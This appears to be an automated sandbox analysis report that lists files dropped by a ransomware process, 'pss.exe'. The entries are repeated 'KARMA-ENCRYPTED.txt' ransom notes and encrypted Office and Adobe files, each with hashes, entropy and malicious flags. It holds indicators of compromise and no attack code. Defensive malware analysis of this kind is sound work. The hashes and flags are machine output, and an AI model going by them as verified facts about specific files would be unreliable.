C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\ES_session_store
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):10309
Entropy (8bit):7.983321589869112
Encrypted:false
SSDEEP:192:V2amqZFwTySg9RM6tq10jXPXOHz2vwkDOfmWo03cUMl+NJYQojkGhIiHbjPgQr:jXZGmSgbHzPRvBWo0sb+NKQMFhIwfhr
MD5:AF58F3F5B3D91A3A4D1FEFFEC2A56E6A
SHA1:E75F37F8C9ED8CE71B0FEF16174BC33C73CBEF3D
SHA-256:15AEEF602F18308D23E9F411B6B8816E0CF381F6E99FC48E08E84330B34194A9
SHA-512:74E8B219D5262FCC8E4CB0B34B5BA0317F53798D6321AA00E3850E08647746A6854DA0150433BBF6964EFA97D358C0EDC6577459171A5F8608D50CC913D827A8
Malicious:true
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\ES_session_storei
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):24221
Entropy (8bit):7.992296279927023
Encrypted:true
SSDEEP:384:tSwQ7lPUDLITUGxBvTBEhieEFt+ZTWxFE0cQMb7MMak+GpV3WNgRipZh:tI7NUfITUev9EhieoIZyxa0cQMb7M4+F
MD5:F3F529FA965732B2EB5D60AE102A1921
SHA1:B8748E98762FE2115807715C48A6FA3395FBF81B
SHA-256:5E6F12E11291DE623C88D7788A31E955B17E7CC0802137F10401EBC7C585DE8B
SHA-512:B33C72ACD28FDDB4000309330A588BBB20CC5B245283D5E5EEF41090D70FCEA09B53DF2D7D8B74ED69F0932798C35C58BB29BA6741689569C63BC7500796A747
Malicious:true
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\ES_session_storek
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):333
Entropy (8bit):7.270414649645231
Encrypted:false
SSDEEP:6:Iz4rNi5aLuXAUQc+3iu9ot2edvseMppST/4alOaCjWXsa/64IUVf:Iz4ZCaqQJc+3it22keN4aIaCRaifif
MD5:F4C528871687B7AE967D2CFF2C3C2A4A
SHA1:2EB78FBE13E92FFAB4642DBB4AEEAAFBCFD71CB5
SHA-256:78BE63CAA9BEA1A2A1CE519976D493747E557553D8DD00DE7BDD361DDAC97535
SHA-512:FFCC133A6C1F38A8A65633953E0782BD9E4880A74D093DA14386EAC867773EC35B46420484BE23C0AFF198A2EE46976980C3C761B2DD6E54F10AA20ACB65309B
Malicious:false
Preview: .-.z8I..`a.5..q/.(...L;O.8)........8...k."DB.....Oc...[L.?...KARMA($..ii.@...:.r.=..+I..2../......lz{3Z....\!<.<y.Y..,o...=.w.d6..cTE...0.......|d.zf..zm.....}..X...2..,Sg......+7.4M....Rf-.w,....~4..H...I..cF......N..IL.qLL,j..'..3o>....+.....c.f.F&....9~.(5`S'9.s~t...w..^...0.,.,D/...ro.h.8...18........6.9
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\addressbook.acrodata
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):14525
Entropy (8bit):7.987581155052435
Encrypted:false
SSDEEP:192:sQWzXTf5X0KEKN+YeyMEFY9UHjOjQ5QKtloUKM8MaYqtfxPMFApDiCnN8Ir:sQ4fxtY9EZOjQ5QJM8MARdMFIlN8+
MD5:F1263448BD4D95874C438659B4E40651
SHA1:9BDA8D5D96B0A06E29542C9626901CF9412AF4BC
SHA-256:A141BD2875912EC5872BE06F11B45438CED3DC7B873E73DB35571BB53FD0A16C
SHA-512:DB1161F8DD0BD7A18F192929FA0925C243487D2192EF997E56340B087D86B913C86FA5A4BF5E2F83FEDB270705B9A460E1CE8991939983B60E781032B717EE59
Malicious:false
C:\Users\user\AppData\Roaming\Adobe\Acrobat\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:true
C:\Users\user\AppData\Roaming\Adobe\Flash Player\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
C:\Users\user\AppData\Roaming\Adobe\Flash Player\NativeCache\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
C:\Users\user\AppData\Roaming\Adobe\Headlights\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
C:\Users\user\AppData\Roaming\Adobe\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:true
C:\Users\user\AppData\Roaming\Adobe\Linguistics\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
C:\Users\user\AppData\Roaming\Adobe\LogTransport2\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
C:\Users\user\AppData\Roaming\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:true
C:\Users\user\AppData\Roaming\Microsoft\AddIns\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
C:\Users\user\AppData\Roaming\Microsoft\Bibliography\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\APASixthEditionOfficeOnline.xsl
Process:C:\Users\user\Desktop\pss.exe
File Type:Dyalog APL mapped file 32-bit version 246.248
Category:dropped
Size (bytes):333671
Entropy (8bit):7.999411716359313
Encrypted:true
SSDEEP:6144:iC58nTaO8FSkZSv4xtIbbubuFZofOHAfob9LZWTf35QFjRHQImmmz2F9RQe32QO:Ma3ZcRbvFZGEbeTf35QFj+2C2zP29
MD5:5EE366E680A23D033F0E975E84F5CABD
SHA1:5015466CEC47A7D181BA22958593498F58E7FA73
SHA-256:147107D67F324D9298D2651B0A1B8466AC9D61C43613EEE17FA381A11A2FD0D0
SHA-512:C64E03B73F132C4BBD387FA120FE0A7D4667BF905BD6EE714D139882223373951E84046ADF2D60BBEDC512CCB4330FC21C29453FBC9AAA2C3B25D31E20C93AF3
Malicious:true
C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\CHICAGO.XSL
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):297086
Entropy (8bit):7.999349226696064
Encrypted:true
SSDEEP:6144:fytb6yOflV2OO3L8vyGGc8s8Gc/BiCgKmCOF02v+1QmAwlThuevH7p+mnYyEfg:G6yOfS78VGcGngK7OecC/F51cg
MD5:F18105FC1CC880CAB30822FC0AA2FB6E
SHA1:837B8CFC5528A6C102C51EF32E3DE7440FB35536
SHA-256:4EF9463BC695CDC4CA3D4A60E36A8443C3EA6B8729D3BB63794C5F7343514B20
SHA-512:DA3B73FBF07CC32E8C9ADA1ECD03DB52AD5643563DA54AC71451449A70F79DA9098088C19CCE154C3FDAD4AD80EC882E0E2DD6197FA93319E85C57DE33AAC5FA
Malicious:true
C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\GB.XSL
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):268739
Entropy (8bit):7.999374762502691
Encrypted:true
SSDEEP:6144:+MBAq/ODsKghS+L5Ghr5vU+ExZlOJAorlY5GMLguvjD:+TMeghghGZlGDxYP0urD
MD5:503CC4377FCEE9A24FF9BB56BCBF65B5
SHA1:F9DD696DF51F11B836D2C3D5B3175A7E9EE8664E
SHA-256:229E30E038556F808367748DE9302F6A5A10E5ED3E8A9C2D9FEC1C4DDB859CA2
SHA-512:8A53DBB3381430E4733E660D39F03A97A438B2E45A0DA8EFF5058776D4DBBCEA530B18C7BF655FEF4A4D3BF8F74F7C483C0A1F007E12870BE951F9FA909632AD
Malicious:true
C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\GostName.XSL
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):256427
Entropy (8bit):7.999256064752385
Encrypted:true
SSDEEP:6144:Qu7OKJN8xHRaFVpM0WO83y50rVAyloDS9/FyFhbi2d18e:pOBHg7TWhyur2yloW/g+s18e
MD5:D95370244700D7A9BB9AA12E6B4A0179
SHA1:316F0B4CD045CDB994DEBC41E2E5E9196E819656
SHA-256:C2E0B5BA837B101FBB82136543C636C57210CD608F3AB59A5FF7DE77CFE5E500
SHA-512:5102E14FDD8C97BDEDCA80750361A42B6D954EF7D45E858430E91E284E9D819251AAFAABB95C5226F6ECC8494DE9818600A24929400CD7963FC3380F8D06ED4D
Malicious:true
C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\GostTitle.XSL
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):251518
Entropy (8bit):7.999383827401665
Encrypted:true
SSDEEP:6144:Wwnqx5ofZjF7pAG+Wm6vzuRtOB+ugYxoEjsXQ/ZOwgEdxlTW251U:WXx5MJF7iYEOB+uH7sg/9xBpI
MD5:66C90CE9DC264B54C9DD174A1CDED7F4
SHA1:5E6C3B6DE3C68CF67B7BB11D6DA03848D17E10D7
SHA-256:3B3758AC0F2AD447AB851DD02496769A8A827D132A4761C3108E19488FEA49B6
SHA-512:2013253BFD3F0AC66450A391BB11BB3E95C7DC118DE8F1E38859C6BD4DAF54FCB32D9747E92473710108ADEEFE75BD10E171379A2791DA0F523CF175A7B43DC4
Malicious:true
C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\HarvardAnglia2008OfficeOnline.xsl
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):284871
Entropy (8bit):7.99924388201897
Encrypted:true
SSDEEP:6144:TtD8ARsB2tQNHwok+IBqyHwLGyWM8X2qUWL3170HlmONeMCYDeBn:TKAuu5oZIBqy6GytGJ0HlmIc
MD5:F4BBDD6CD7E032CD312D35232A3FCC8A
SHA1:B70EB878D86CE4D2D8A1E05BF8144EC02466ACDD
SHA-256:7EAD398F5B22612495EDEDFB40143E8C0E093E61F0EDE08686F2872C75F6AF48
SHA-512:2D5B8905FD1396D182212CB0865D23AC1B89AF751DB3AD44D870FD52B824511A8F1F5E1FF6D90DBC09867E95398AB6457241B0ABBFD14BC99167D36E2CB37A8F
Malicious:true
C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\IEEE2006OfficeOnline.xsl
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):294594
Entropy (8bit):7.999487811845438
Encrypted:true
SSDEEP:6144:0yqVoy7rRbpEh8ROw1e9N+y0EJADmsqzt:0JnxpAfMot
MD5:68C73707485E803B2ACF276FD155E5AB
SHA1:581F5787BC2B00B42FE08EFBC2D7BBD7F2ABB71D
SHA-256:6FE27FC470D84A273EC26DA173E310DB00D93F538A948A56E4019D6F543DF19C
SHA-512:5AD5178A33C70296701E65A1121E5D9FC21E99B8BFC1FE540D389A1B732614E4C0CDB83A961CF428C1957231C0E19DDCB041160AA3FDE3F34B26661601599815
Malicious:true
C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\ISO690.XSL
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):270711
Entropy (8bit):7.999111205500655
Encrypted:true
SSDEEP:6144:FakIS3RxlWxmvwoWZFUU6GOb0zn/ZmKv8R+TNNmgVdEL:FDIS3RxlkmvwPUfGOinBmKUiNN9VA
MD5:072C0F26EC1928B84B985A9D902FBAEF
SHA1:11227E021031C735C330135CDDE3DFB351599B7C
SHA-256:AD50AF309BBFC221FBB95F73CA7EE1385AB17FF0EC48C25C289C1C33C1DF95B1
SHA-512:07DE2354340410427055FE5B7CDA973B0C4658F1FBFE777A928D3E7D70BF431C43D3FA2A05E6F7155EF52463FC25C3A801A837D1B459F1D52947FCACC80E5F62
Malicious:true
C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\ISO690Nmerical.XSL
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):217647
Entropy (8bit):7.999060804982078
Encrypted:true
SSDEEP:6144:EhoqsheNF97OvaofjEeLhnxOhrL7ErdvNzSovyPehvhkhnhObbR:EhoZeenLqh7EruoKPehwnhObbR
MD5:E540715341631B8E1D0F33FDFCEDAD1C
SHA1:1C897C6653B9C79C84DD10C3DEDFED3956807E91
SHA-256:5459707C0CF38C54989578A85E7019F8D9559C75DC93425528387A2EF42135DA
SHA-512:6ED12A47A58C47A1B7BAB6EDC04A73487836C49C13C2AF2782F37DD273A5362027EDDBF13D084BAABAD62B495BCEECB9E61AC449186D94D14678E1E2F82D7FE7
Malicious:true
C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\MLASeventhEditionOfficeOnline.xsl
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):255288
Entropy (8bit):7.999364255656324
Encrypted:true
SSDEEP:6144:ujSpLTcBvjRtpniDlG/+3TzXoPxE/ai+Eum48eDMT:u+RcdDpnixG23aQVFum48OMT
MD5:6F24CAFE0253E43ACC6468777E71AC2D
SHA1:3CBAF92D63F601B01276EB34C202CB7E2F35DBD9
SHA-256:F11D6B244525A59517BEB256699139C722F654964E3D19C175BD3201EB9623C8
SHA-512:1BD610D6116B06A8CB1297F8D2664720E5721F3FEEA23BF2FE31166803D0DC654F41E78E7BB34ED34987381E227DE98E563182DE64CE71D09F7285A122E329F1
Malicious:true
C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\SIST02.XSL
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):251405
Entropy (8bit):7.999389953090911
Encrypted:true
SSDEEP:6144:3ZNOAg/W/CAzVVgXd4RSiGoctWq4Ebt+GueR:pNOu/BVyKadcq4jGueR
MD5:77A395D277A8C281B7F26871CF8FF924
SHA1:86CF072DC3A3BFFB0266012994E0F1B9C31B0D21
SHA-256:16D81764438D5DBD12D4F1CBC806250B57E184106B89F7817A5CACCEE1814E17
SHA-512:EE41EFC6B38C59404B1611D0DCEE9945ADD7DEAF575B891C9C89D7679B72F9127EC985ED8D0971F6547B05CA1168CC9279421C7153997BE1378DE770368F61B2
Malicious:true
C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\TURABIAN.XSL
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):344731
Entropy (8bit):7.999504743812455
Encrypted:true
SSDEEP:6144:4XggeaS8zt2bzAjXsbs1oVKSyBLhTBBllJ/aBb/0p0+96DNXmIzRcf+UNBT:kgglzt2X6XwKp7laBb/l+4NlRUX
MD5:073928B9EE8C475907DD05DE23E3DD95
SHA1:340A730BA037B34AFD46E1EC6A008A861CED5B09
SHA-256:2B8D7FA489C81E5D1B8C81CC48274A2A1722216EB933406EEB3A27764A9A4473
SHA-512:1C3FF810C553372CEA4BC451F808EAC65AD554B9257E05E746D953318C135702845D0B12836A48C8617ADC63ED134A0D77DE2A538E61BFACFF571E3B6C946969
Malicious:true
C:\Users\user\AppData\Roaming\Microsoft\Credentials\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
C:\Users\user\AppData\Roaming\Microsoft\Document Building Blocks\1033\16\Built-In Building Blocks.dotx
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1920069
Entropy (8bit):7.999912641515446
Encrypted:true
SSDEEP:49152:a8aM9kUFuvwabpj/T7YEpY97v4r1KYvUG/Cnb8UxaGkADDplvh:TaMWU4xiGY97K1KYdCj1k8Dvh
MD5:89C9E5FEC59D85C85888509692A0E8D1
SHA1:ED4F82C892E2A0DA76E3217D9CCBB538097B2801
SHA-256:F16457DC290B18CD8D50BA5770C3EF06DF4FD4BADD123434D0E73A10E091A4E9
SHA-512:D34454DB464E9CCE9247F2177BDA1677AEF3DF4021CF9AD0C89D66EC20C30F7B14B13D3CF8D3FACD6F99637B0472A58F866222178A4023F91B175436F5B3E351
Malicious:true
C:\Users\user\AppData\Roaming\Microsoft\Document Building Blocks\1033\16\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
C:\Users\user\AppData\Roaming\Microsoft\Document Building Blocks\1033\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
C:\Users\user\AppData\Roaming\Microsoft\Document Building Blocks\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
C:\Users\user\AppData\Roaming\Microsoft\Excel\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
C:\Users\user\AppData\Roaming\Microsoft\Excel\XLSTART\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
